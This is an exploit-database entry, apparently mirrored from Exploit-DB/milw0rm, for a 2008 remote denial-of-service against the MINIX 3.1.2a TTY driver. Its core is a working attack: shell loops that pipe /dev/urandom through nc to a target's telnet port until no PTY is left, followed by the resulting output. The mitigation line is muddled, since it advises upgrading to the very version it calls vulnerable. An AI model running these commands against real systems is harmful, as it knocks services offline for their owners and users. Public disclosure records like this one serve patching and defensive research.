header-logo
Suggest Exploit
vendor:
minix 3.1.2a
by:
kokanin
7.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: minix 3.1.2a
Affected Version From: minix 3.1.2a
Affected Version To: minix 3.1.2a
Patch Exists: YES
Related CWE: N/A
CPE: minix
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2008

minix 3.1.2a remote tty panic

A buffer overflow vulnerability exists in the minix 3.1.2a operating system. An attacker can exploit this vulnerability by sending a large amount of data to the target system via the network connection. This will cause the system to panic and crash.

Mitigation:

Upgrade to the latest version of minix 3.1.2a or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

# kokanin@gmail 20080724
# minix 3.1.2a remote tty panic

trunk/src/drivers/tty/tty.c

 14965	  if ((status = send(replyee, &tty_mess)) != OK) {
 14966	        panic("TTY","tty_reply failed, status\n", status);


$ (while true ; do sleep 1 && killall nc 2>/dev/null; done) &
$ while true ; do cat /dev/urandom | nc 192.168.1.42 23 ; done
[snip garbage]
I am sorry, but there is no free PTY left!
$ fg
$ ^C

hai, no moar pty, remotely, kthxbye
--
kokanin

# milw0rm.com [2008-07-25]

Navigation

Suggest Exploit

Services By CQR